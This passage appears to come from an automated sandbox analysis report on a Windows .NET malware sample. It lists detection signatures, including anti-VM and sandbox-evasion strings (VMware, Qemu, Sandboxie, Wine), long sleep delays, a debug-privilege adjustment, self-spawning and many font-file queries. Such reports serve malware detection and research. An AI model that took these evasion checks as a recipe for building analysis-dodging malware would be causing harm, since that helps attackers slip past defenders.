                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Code function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                    Source: initial sample, Static PE information: section name: .text entropy: 7.85676588796
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Process information set: NOGPFAULTERRORBOX

                    Malware Analysis System Evasion:

                    Yara detected AntiVM_3
                    Source: Yara match, File source: 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Window / User API: threadDelayed 2200
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 7164 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 3512 Thread sleep count: 2200 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 3512 Thread sleep count: 82 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 7112 Thread sleep time: -41500s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 724 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 1744 Thread sleep count: 65 > 30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe TID: 1744 Thread sleep time: -3900000s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 1_2_00403D74
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: VMware
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: vmware
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Binary or memory string: Qemu)
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: VMWARE
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h] 1_2_0040317B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap, 1_2_00402B7C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmp Binary or memory string: Progman
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.608249418.00000000015C0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
